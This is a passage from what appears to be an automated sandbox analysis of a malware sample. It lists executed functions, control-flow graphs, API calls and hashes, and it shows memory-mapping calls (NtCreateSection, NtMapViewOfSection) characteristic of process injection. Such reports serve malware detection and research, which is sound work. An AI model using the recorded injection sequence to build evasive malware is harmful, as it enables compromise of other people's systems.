7607 421180 GetStartupInfoW 7606->7607 7608 421188 7606->7608 7607->7608 7608->7601 7610 421191 GetModuleHandleExA 7608->7610 7609 421371 7611 42137d 7609->7611 7621 420e80 LoadLibraryA 7609->7621 7610->7601 7611->7609 7613 4213d3 7622 4205d0 LoadLibraryW GetProcAddress VirtualProtect 7613->7622 7615 4213d8 7624 420fb0 7615->7624 7617 421441 7617->7617 7618 4213e2 7618->7617 7619 421415 GetProcessWorkingSetSize 7618->7619 7619->7618 7623 4205a0 LocalAlloc 7620->7623 7621->7613 7622->7615 7623->7609 7631 420ef0 7624->7631 7627 421044 7634 420f20 7627->7634 7628 420fe9 FreeEnvironmentStringsW ReadEventLogA CreateNamedPipeA FileTimeToLocalFileTime 7628->7627 7632 420f01 RtlAllocateHeap LoadLibraryA 7631->7632 7633 420f15 7631->7633 7632->7633 7633->7627 7633->7628 7635 420f62 7634->7635 7638 420f3b 7634->7638 7636 420f93 7635->7636 7637 420f69 GetServiceKeyNameW 7635->7637 7636->7618 7637->7636 7638->7635 7639 420f4d FreeEnvironmentStringsW 7638->7639 7639->7638 7782 1f092b GetPEB 7783 1f0972 7782->7783 7802 551de0 7803 551df1 7802->7803 7804 552591 3 API calls 7803->7804 7805 551e09 7804->7805 7674 402eba 7675 402ecc 7674->7675 7677 402f54 7675->7677 7678 40193e 7675->7678 7679 40194f 7678->7679 7680 401991 Sleep 7679->7680 7681 4019ac 7680->7681 7683 4019bd 7681->7683 7684 401553 7681->7684 7683->7677 7685 401563 7684->7685 7686 4018dd 7685->7686 7687 401608 NtDuplicateObject 7685->7687 7686->7683 7687->7686 7688 401625 NtCreateSection 7687->7688 7689 4016a5 NtCreateSection 7688->7689 7690 40164b NtMapViewOfSection 7688->7690 7689->7686 7691 4016d1 7689->7691 7690->7689 7692 40166e NtMapViewOfSection 7690->7692 7691->7686 7693 4016db NtMapViewOfSection 7691->7693 7692->7689 7694 40168c 7692->7694 7693->7686 7695 401702 NtMapViewOfSection 7693->7695 7694->7689 7695->7686 7696 401724 7695->7696 7696->7686 7698 401729 7696->7698 7699 40172b 7698->7699 7704 401724 7698->7704 7700 4016be NtCreateSection 7699->7700 7699->7704 7701 4016d1 7700->7701 7700->7704 7702 4016db NtMapViewOfSection 7701->7702 7701->7704 7703 401702 NtMapViewOfSection 7702->7703 7702->7704 7703->7704 7704->7686 7864 4222be 7865 4222d2 RtlEncodePointer 7864->7865 7866 4222c9 7864->7866 7790 42393d 7791 423661 __raise_exc_ex RaiseException 7790->7791 7792 42395b 7791->7792

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004205D0 Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 233librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4205d0-420e7c LoadLibraryW GetProcAddress VirtualProtect
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(00432B28,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 00420E48
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0042A3E0), ref: 00420E54
                                                                                                                                                                      • VirtualProtect.KERNELBASE(00430A2C,00432EAC,00000040,?), ref: 00420E74
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432518633.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_413000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                                                      • String ID: )?u$:/X$F(+$O8##$R'._$U99x$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                      • API String ID: 3509694964-975362989
                                                                                                                                                                      • Opcode ID: 6ddae236ef9050d404d5ee3ef1b8c205b4b68fcdbf2e0cd4556e9ec628b5341b
                                                                                                                                                                      • Instruction ID: b888287569ae84761c73a855bed93743e283a704e3e46ab774050eddf2396468
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ddae236ef9050d404d5ee3ef1b8c205b4b68fcdbf2e0cd4556e9ec628b5341b
                                                                                                                                                                      • Instruction Fuzzy Hash: 7502A6B410E385CBD2B49F469689B8EBBF0BB91704F608E0CD6DD1A224CB754589CF97
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 86 401553-4015b2 call 4011cd 98 4015b4 86->98 99 4015b7-4015bc 86->99 98->99 101 4015c2-4015d3 99->101 102 4018df-4018e7 99->102 105 4015d9-401602 101->105 106 4018dd 101->106 102->99 107 4018ec-40193b call 4011cd 102->107 105->106 115 401608-40161f NtDuplicateObject 105->115 106->107 115->106 117 401625-401649 NtCreateSection 115->117 119 4016a5-4016cb NtCreateSection 117->119 120 40164b-40166c NtMapViewOfSection 117->120 119->106 121 4016d1-4016d5 119->121 120->119 123 40166e-40168a NtMapViewOfSection 120->123 121->106 124 4016db-4016fc NtMapViewOfSection 121->124 123->119 126 40168c-4016a2 123->126 124->106 127 401702-40171e NtMapViewOfSection 124->127 126->119 127->106 130 401724 127->130 130->106 132 401724 call 401729 130->132 132->106
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 133 40156b-4015b2 call 4011cd 145 4015b4 133->145 146 4015b7-4015bc 133->146 145->146 148 4015c2-4015d3 146->148 149 4018df-4018e7 146->149 152 4015d9-401602 148->152 153 4018dd 148->153 149->146 154 4018ec-40193b call 4011cd 149->154 152->153 162 401608-40161f NtDuplicateObject 152->162 153->154 162->153 164 401625-401649 NtCreateSection 162->164 166 4016a5-4016cb NtCreateSection 164->166 167 40164b-40166c NtMapViewOfSection 164->167 166->153 168 4016d1-4016d5 166->168 167->166 170 40166e-40168a NtMapViewOfSection 167->170 168->153 171 4016db-4016fc NtMapViewOfSection 168->171 170->166 173 40168c-4016a2 170->173 171->153 174 401702-40171e NtMapViewOfSection 171->174 173->166 174->153 177 401724 174->177 177->153 179 401724 call 401729 177->179 179->153
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                      • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 180 401561-4015b2 call 4011cd 190 4015b4 180->190 191 4015b7-4015bc 180->191 190->191 193 4015c2-4015d3 191->193 194 4018df-4018e7 191->194 197 4015d9-401602 193->197 198 4018dd 193->198 194->191 199 4018ec-40193b call 4011cd 194->199 197->198 207 401608-40161f NtDuplicateObject 197->207 198->199 207->198 209 401625-401649 NtCreateSection 207->209 211 4016a5-4016cb NtCreateSection 209->211 212 40164b-40166c NtMapViewOfSection 209->212 211->198 213 4016d1-4016d5 211->213 212->211 215 40166e-40168a NtMapViewOfSection 212->215 213->198 216 4016db-4016fc NtMapViewOfSection 213->216 215->211 218 40168c-4016a2 215->218 216->198 219 401702-40171e NtMapViewOfSection 216->219 218->211 219->198 222 401724 219->222 222->198 224 401724 call 401729 222->224 224->198
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                      • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 225 40156f-4015b2 call 4011cd 233 4015b4 225->233 234 4015b7-4015bc 225->234 233->234 236 4015c2-4015d3 234->236 237 4018df-4018e7 234->237 240 4015d9-401602 236->240 241 4018dd 236->241 237->234 242 4018ec-40193b call 4011cd 237->242 240->241 250 401608-40161f NtDuplicateObject 240->250 241->242 250->241 252 401625-401649 NtCreateSection 250->252 254 4016a5-4016cb NtCreateSection 252->254 255 40164b-40166c NtMapViewOfSection 252->255 254->241 256 4016d1-4016d5 254->256 255->254 258 40166e-40168a NtMapViewOfSection 255->258 256->241 259 4016db-4016fc NtMapViewOfSection 256->259 258->254 261 40168c-4016a2 258->261 259->241 262 401702-40171e NtMapViewOfSection 259->262 261->254 262->241 265 401724 262->265 265->241 267 401724 call 401729 265->267 267->241
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 268 401583-4015b2 call 4011cd 277 4015b4 268->277 278 4015b7-4015bc 268->278 277->278 280 4015c2-4015d3 278->280 281 4018df-4018e7 278->281 284 4015d9-401602 280->284 285 4018dd 280->285 281->278 286 4018ec-40193b call 4011cd 281->286 284->285 294 401608-40161f NtDuplicateObject 284->294 285->286 294->285 296 401625-401649 NtCreateSection 294->296 298 4016a5-4016cb NtCreateSection 296->298 299 40164b-40166c NtMapViewOfSection 296->299 298->285 300 4016d1-4016d5 298->300 299->298 302 40166e-40168a NtMapViewOfSection 299->302 300->285 303 4016db-4016fc NtMapViewOfSection 300->303 302->298 305 40168c-4016a2 302->305 303->285 306 401702-40171e NtMapViewOfSection 303->306 305->298 306->285 309 401724 306->309 309->285 311 401724 call 401729 309->311 311->285
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                      • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 312 401587-4015b2 call 4011cd 316 4015b4 312->316 317 4015b7-4015bc 312->317 316->317 319 4015c2-4015d3 317->319 320 4018df-4018e7 317->320 323 4015d9-401602 319->323 324 4018dd 319->324 320->317 325 4018ec-40193b call 4011cd 320->325 323->324 333 401608-40161f NtDuplicateObject 323->333 324->325 333->324 335 401625-401649 NtCreateSection 333->335 337 4016a5-4016cb NtCreateSection 335->337 338 40164b-40166c NtMapViewOfSection 335->338 337->324 339 4016d1-4016d5 337->339 338->337 341 40166e-40168a NtMapViewOfSection 338->341 339->324 342 4016db-4016fc NtMapViewOfSection 339->342 341->337 344 40168c-4016a2 341->344 342->324 345 401702-40171e NtMapViewOfSection 342->345 344->337 345->324 348 401724 345->348 348->324 350 401724 call 401729 348->350 350->324
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 351 401729 352 40172b 351->352 353 40172f-40174d 351->353 352->353 354 40172d 352->354 365 401764 353->365 366 401755-401778 353->366 354->353 356 4016be-4016cb NtCreateSection 354->356 358 4016d1-4016d5 356->358 359 4018dd-40193b call 4011cd 356->359 358->359 361 4016db-4016fc NtMapViewOfSection 358->361 361->359 364 401702-40171e NtMapViewOfSection 361->364 364->359 369 401724 364->369 365->366 377 40177b-4017b8 366->377 369->359 372 401724 call 401729 369->372 372->359 393 4017ba-4017e3 377->393 398 4017e5-4017eb 393->398 399 4017ed 393->399 400 4017f3-4017f9 398->400 399->400 401 401809-40180d 400->401 402 4017fb-401807 400->402 401->400 403 40180f-401814 401->403 402->401 404 401816 call 40181b 403->404 405 40187c-40188b 403->405 406 40188e-401891 405->406 408 401893-40189d 406->408 409 4018bb-4018d4 406->409 410 4018a0-4018a9 408->410 409->359 411 4018b7 410->411 412 4018ab-4018b5 410->412 411->410 413 4018b9 411->413 412->411 413->406
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 33071139-0
                                                                                                                                                                      • Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
                                                                                                                                                                      • Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00552591 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 414 552591-5525aa 415 5525ac-5525ae 414->415 416 5525b5-5525c1 CreateToolhelp32Snapshot 415->416 417 5525b0 415->417 418 5525d1-5525de Module32First 416->418 419 5525c3-5525c9 416->419 417->416 420 5525e7-5525ef 418->420 421 5525e0-5525e1 call 552250 418->421 419->418 424 5525cb-5525cf 419->424 425 5525e6 421->425 424->415 424->418 425->420
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005525B9
                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 005525D9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1433007725.000000000054F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0054F000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_54f000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction ID: 2c4b05445feb76299a49f6aa8ce2da1a9f8910e9ba8b1f383481c9c512e795f6
                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction Fuzzy Hash: D2F09C351007116BD7203BF59C9DB6E7AECBF4A726F100529ED46D54C0EB70ED494751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 001F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
